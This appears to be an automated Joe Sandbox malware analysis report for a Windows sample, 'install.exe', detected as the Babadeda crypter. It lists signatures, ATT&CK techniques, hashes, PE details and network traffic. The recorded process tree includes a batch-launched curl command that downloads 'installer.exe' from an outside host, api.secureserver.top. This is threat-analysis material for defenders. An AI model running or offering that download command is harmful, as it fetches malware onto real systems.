Windows
Analysis Report
install.exe
Overview
General Information
Detection
Babadeda
Score: | 60 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected Babadeda
Joe Sandbox ML detected suspicious sample
AV process strings found (often used to terminate AV products)
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Classification
- System is w10x64
install.exe (PID: 7312 cmdline:
"C:\Users\ user\Deskt op\install .exe" MD5: 3E4D454632A75DFB3A024977190A3E22) conhost.exe (PID: 7320 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 7364 cmdline:
"C:\Window s\sysnativ e\cmd" /c "C:\Users\ user\AppDa ta\Local\T emp\F73F.t mp\F740.tm p\F741.bat C:\Users\ user\Deskt op\install .exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) curl.exe (PID: 7380 cmdline:
curl -o in staller.ex e api.secu reserver.t op/api/fil es/winples kdedicated /installer .exe?key=w inpleskded icated MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Babadeda | According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines. | No Attribution |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security | ||
JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | Integrated Neural Analysis Model: |
Source: | Static PE information: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_00411079 | |
Source: | Code function: | 0_2_00411C20 | |
Source: | Code function: | 0_2_00411033 | |
Source: | Code function: | 0_2_00410C80 | |
Source: | Code function: | 0_2_00410CA0 | |
Source: | Code function: | 0_2_0040B9C7 | |
Source: | Code function: | 0_2_0040FA68 | |
Source: | Code function: | 0_2_0040CF18 | |
Source: | Code function: | 0_2_0040EFF0 | |
Source: | Code function: | 0_2_00410FB0 |
Source: | Static PE information: |
Source: | Classification label: |
Source: | Code function: | 0_2_00402664 |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Process created: |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: | ||
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Data Obfuscation |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Code function: | 0_2_0040ADD6 |
Source: | Static PE information: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Window / User API: | Jump to behavior |
Source: | Last function: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 0_2_0040ADD6 |
Source: | Code function: | 0_2_00409FD0 | |
Source: | Code function: | 0_2_00409FB0 |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_00405573 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Native API | 1 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 1 Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | 12 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
50% | ReversingLabs | Win32.Trojan.Generic | ||
44% | Virustotal | Browse |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
api.secureserver.top | 104.21.48.1 | true | false | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.21.48.1 | api.secureserver.top | United States | 13335 | CLOUDFLARENETUS | false |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1619164 |
Start date and time: | 2025-02-19 16:32:13 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 2m 9s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 5 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | install.exe |
Detection: | MAL |
Classification: | mal60.troj.winEXE@7/5@1/2 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe
- Not all processes where analyzed, report is missing behavior information
⊘No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.21.48.1 | Get hash | malicious | FormBook | Browse |
| |
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
|
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | RedLine | Browse |
|
⊘No context
⊘No context
Process: | C:\Users\user\Desktop\install.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 273 |
Entropy (8bit): | 4.988292235209252 |
Encrypted: | false |
SSDEEP: | 6:NS01f912SgbuWNEfNVOXLICbFDgOXLMVXikpOXL4ekFqLWREgXL6Nu:NSu9o3uAOuXJbFlXgvpOX+FqiTXEu |
MD5: | 88BB18EE5991E273D03733BD4A87E458 |
SHA1: | F0A88DEACE4D5120A30D11EE21EB35C49CDCDF41 |
SHA-256: | BF0CB41983D064B8FCED4248130A104A535F683D94F49D1F59BE1EBE63AFB58D |
SHA-512: | 35D16BD39D68F74C9D0EFAA7A093005084A24CED36E4468E5FA8AF31AC99A1FA9E648CC73F1B163D4148E69E8E3DB28524E25BA5700028456FE215890E267BBC |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1835008 |
Entropy (8bit): | 4.418972265813879 |
Encrypted: | false |
SSDEEP: | 6144:GSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:lvloTMW+EZMM6DFyn03w |
MD5: | A107D3DBA1FC3510CC0F58604EB84730 |
SHA1: | DB7B84CBF16B03B9E1280E629DEA64728FB46B39 |
SHA-256: | 030F7567B4789619B69728E7F1BEED0DFD903013060794CF1FC246F014B519C0 |
SHA-512: | 652B7D985777E94E9F3FDB3274DA39F793E8428F844472F4C9377DA9A91E1BB8E3C6311464EC2B983361979E15CE7F2B9A485516E76727241F31C1D588548EF8 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\curl.exe |
File Type: | |
Category: | modified |
Size (bytes): | 9 |
Entropy (8bit): | 2.94770277922009 |
Encrypted: | false |
SSDEEP: | 3:+Fn:+F |
MD5: | 68FBA39BF5E9921EA84E938BB927FB30 |
SHA1: | BB0B4B65733B417F758A3F9BEE1FF227291E8462 |
SHA-256: | 2F015C6D00613823357262F6D608360E3E7EB5CB9CF889A5B91193CE67B1B1B7 |
SHA-512: | C71F0937A637E676AA936B320A78DF2759453A0DD2B99AF25380462FC09C749F291DA14B031168D7E5CE12A786CB85979BDE9643D670DDBB998A4169E3597FE3 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\curl.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 399 |
Entropy (8bit): | 2.991530018216461 |
Encrypted: | false |
SSDEEP: | 6:I2swj2SAykymUeC3/8UniegCSgOgc4SaivIdxFFaSaivIdy:Vz6ykymUePbnc9c4SCdx/aSCdy |
MD5: | E3AFBF5FC6807BFD8C76906D27C3B1AE |
SHA1: | D927CC2803F1A9C0C3F635EF87DF1DAFC94AC064 |
SHA-256: | D40F46530DCD9A8DEA89FE002E07367701CC8666291C298FE266F21FA94BA964 |
SHA-512: | F9FA37CE2B24487E779FDA48537ECCA84233B809C11B30A346A1EE52E048521020CE94C62D63C1DD1E964F9949CAB1E2A2D941EF10AA6C98E2B0FDC36AC3C2EB |
Malicious: | false |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.6836112848958615 |
TrID: |
|
File name: | install.exe |
File size: | 91'136 bytes |
MD5: | 3e4d454632a75dfb3a024977190a3e22 |
SHA1: | 10addb3b65ad03714f1b1f081ec75dea97a1c81e |
SHA256: | ad134b16820dc49c200b7c2cfcae83e34ed2e3424484ffe47be8050521662471 |
SHA512: | 58d82423c06741170803fbb70e8023255fe6d5a63cc2dec391063bd97e7169071bcf907436fd76f7253d13a4e93c3b91b31fd217995e1601be098b713eaa98c5 |
SSDEEP: | 1536:D7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfDwJO0:f7DhdC6kzWypvaQ0FxyNTBfD8 |
TLSH: | 1E936C41F3E102F7EAF2053100A6722F973663389764A8DBC75C2E529913AD5A63D3E9 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....L...............0....@........................................................................ |
Icon Hash: | 00928e8e8686b000 |
Entrypoint: | 0x401000 |
Entrypoint Section: | .code |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows cui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | |
Time Stamp: | 0x5D40055D [Tue Jul 30 08:52:45 2019 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | 2c5f2513605e48f2d8ea5440a870cb9e |
Instruction |
---|
push 000000ACh |
push 00000000h |
push 00418068h |
call 00007F4CB0DD44D1h |
add esp, 0Ch |
push 00000000h |
call 00007F4CB0DD44CAh |
mov dword ptr [0041806Ch], eax |
push 00000000h |
push 00001000h |
push 00000000h |
call 00007F4CB0DD44B7h |
mov dword ptr [00418068h], eax |
call 00007F4CB0DD4431h |
mov eax, 0041707Ch |
mov dword ptr [0041808Ch], eax |
call 00007F4CB0DDD8F2h |
call 00007F4CB0DDD65Ah |
call 00007F4CB0DDA538h |
call 00007F4CB0DD9DBCh |
call 00007F4CB0DD984Fh |
call 00007F4CB0DD95C9h |
call 00007F4CB0DD8A6Dh |
call 00007F4CB0DD81EDh |
call 00007F4CB0DD47AFh |
call 00007F4CB0DDC1B8h |
call 00007F4CB0DDAC60h |
mov edx, 0041702Eh |
lea ecx, dword ptr [00418074h] |
call 00007F4CB0DD4448h |
push FFFFFFF5h |
call 00007F4CB0DD4458h |
mov dword ptr [00418094h], eax |
mov eax, 00000200h |
push eax |
lea eax, dword ptr [00418110h] |
push eax |
xor eax, eax |
push eax |
push 00000015h |
push 00000004h |
call 00007F4CB0DD9812h |
push dword ptr [004180F8h] |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1716c | 0xc8 | .data |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x19000 | 0x5ac | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x17470 | 0x23c | .data |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.code | 0x1000 | 0x387e | 0x3a00 | 46da2c5018752470fd3127bf22d63b95 | False | 0.4595231681034483 | data | 5.529218938453912 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.text | 0x5000 | 0xd962 | 0xda00 | e1a026e66953c410d7f60b1f1e3c560f | False | 0.5144244552752294 | data | 6.56248809649253 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x13000 | 0x33a5 | 0x3400 | a16842a34a5da6feda9533bb3e83c3c1 | False | 0.8049128605769231 | data | 7.111835561466389 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x17000 | 0x178c | 0x1200 | 79bcecb4e4599c1e69827415f2abe078 | False | 0.4034288194444444 | data | 5.1018889079921905 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x19000 | 0x5ac | 0x600 | 1f52d3227bbbfd04c11e89197e137d47 | False | 0.6276041666666666 | data | 5.841645998960712 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_RCDATA | 0x1921c | 0x10 | ISO-8859 text, with no line terminators, with overstriking | 1.5625 | ||
RT_RCDATA | 0x1922c | 0x107 | data | 1.0418250950570342 | ||
RT_RCDATA | 0x19334 | 0xe | zlib compressed data | 1.5714285714285714 | ||
RT_RCDATA | 0x19344 | 0x1 | very short file (no magic) | 9.0 | ||
RT_MANIFEST | 0x19348 | 0x263 | XML 1.0 document, ASCII text | 0.5319148936170213 |
DLL | Import |
---|---|
MSVCRT.dll | memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, wcscat, memcpy, tolower, malloc |
KERNEL32.dll | GetModuleHandleW, HeapCreate, GetStdHandle, SetConsoleCtrlHandler, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, GetProcAddress, GetVersionExW, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, PeekNamedPipe, TerminateProcess, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, DuplicateHandle, CreatePipe, CreateProcessW, GetExitCodeProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, RegisterWaitForSingleObject |
USER32.DLL | CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos |
GDI32.DLL | GetStockObject |
COMCTL32.DLL | InitCommonControlsEx |
SHELL32.DLL | ShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW |
WINMM.DLL | timeBeginPeriod |
OLE32.DLL | CoInitialize, CoTaskMemFree |
SHLWAPI.DLL | PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 19, 2025 16:33:04.779540062 CET | 49706 | 80 | 192.168.2.5 | 104.21.48.1 |
Feb 19, 2025 16:33:04.784656048 CET | 80 | 49706 | 104.21.48.1 | 192.168.2.5 |
Feb 19, 2025 16:33:04.784883022 CET | 49706 | 80 | 192.168.2.5 | 104.21.48.1 |
Feb 19, 2025 16:33:04.784883022 CET | 49706 | 80 | 192.168.2.5 | 104.21.48.1 |
Feb 19, 2025 16:33:04.789921045 CET | 80 | 49706 | 104.21.48.1 | 192.168.2.5 |
Feb 19, 2025 16:33:05.739943027 CET | 80 | 49706 | 104.21.48.1 | 192.168.2.5 |
Feb 19, 2025 16:33:05.739984989 CET | 80 | 49706 | 104.21.48.1 | 192.168.2.5 |
Feb 19, 2025 16:33:05.740026951 CET | 49706 | 80 | 192.168.2.5 | 104.21.48.1 |
Feb 19, 2025 16:33:05.749902964 CET | 49706 | 80 | 192.168.2.5 | 104.21.48.1 |
Feb 19, 2025 16:33:05.755145073 CET | 80 | 49706 | 104.21.48.1 | 192.168.2.5 |
Feb 19, 2025 16:33:05.755203962 CET | 49706 | 80 | 192.168.2.5 | 104.21.48.1 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 19, 2025 16:33:04.630263090 CET | 58066 | 53 | 192.168.2.5 | 1.1.1.1 |
Feb 19, 2025 16:33:04.773578882 CET | 53 | 58066 | 1.1.1.1 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Feb 19, 2025 16:33:04.630263090 CET | 192.168.2.5 | 1.1.1.1 | 0x747d | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Feb 19, 2025 16:33:04.773578882 CET | 1.1.1.1 | 192.168.2.5 | 0x747d | No error (0) | 104.21.48.1 | A (IP address) | IN (0x0001) | false | ||
Feb 19, 2025 16:33:04.773578882 CET | 1.1.1.1 | 192.168.2.5 | 0x747d | No error (0) | 104.21.32.1 | A (IP address) | IN (0x0001) | false | ||
Feb 19, 2025 16:33:04.773578882 CET | 1.1.1.1 | 192.168.2.5 | 0x747d | No error (0) | 104.21.80.1 | A (IP address) | IN (0x0001) | false | ||
Feb 19, 2025 16:33:04.773578882 CET | 1.1.1.1 | 192.168.2.5 | 0x747d | No error (0) | 104.21.16.1 | A (IP address) | IN (0x0001) | false | ||
Feb 19, 2025 16:33:04.773578882 CET | 1.1.1.1 | 192.168.2.5 | 0x747d | No error (0) | 104.21.64.1 | A (IP address) | IN (0x0001) | false | ||
Feb 19, 2025 16:33:04.773578882 CET | 1.1.1.1 | 192.168.2.5 | 0x747d | No error (0) | 104.21.96.1 | A (IP address) | IN (0x0001) | false | ||
Feb 19, 2025 16:33:04.773578882 CET | 1.1.1.1 | 192.168.2.5 | 0x747d | No error (0) | 104.21.112.1 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49706 | 104.21.48.1 | 80 | 7380 | C:\Windows\System32\curl.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 19, 2025 16:33:04.784883022 CET | 147 | OUT | |
Feb 19, 2025 16:33:05.739943027 CET | 1236 | IN | |
Feb 19, 2025 16:33:05.739984989 CET | 293 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 10:33:03 |
Start date: | 19/02/2025 |
Path: | C:\Users\user\Desktop\install.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 91'136 bytes |
MD5 hash: | 3E4D454632A75DFB3A024977190A3E22 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 10:33:03 |
Start date: | 19/02/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 10:33:03 |
Start date: | 19/02/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6463a0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 10:33:03 |
Start date: | 19/02/2025 |
Path: | C:\Windows\System32\curl.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7cd470000 |
File size: | 530'944 bytes |
MD5 hash: | EAC53DDAFB5CC9E780A7CC086CE7B2B1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Execution Graph
Execution Coverage: | 13.1% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 1.7% |
Total number of Nodes: | 2000 |
Total number of Limit Nodes: | 34 |
Graph
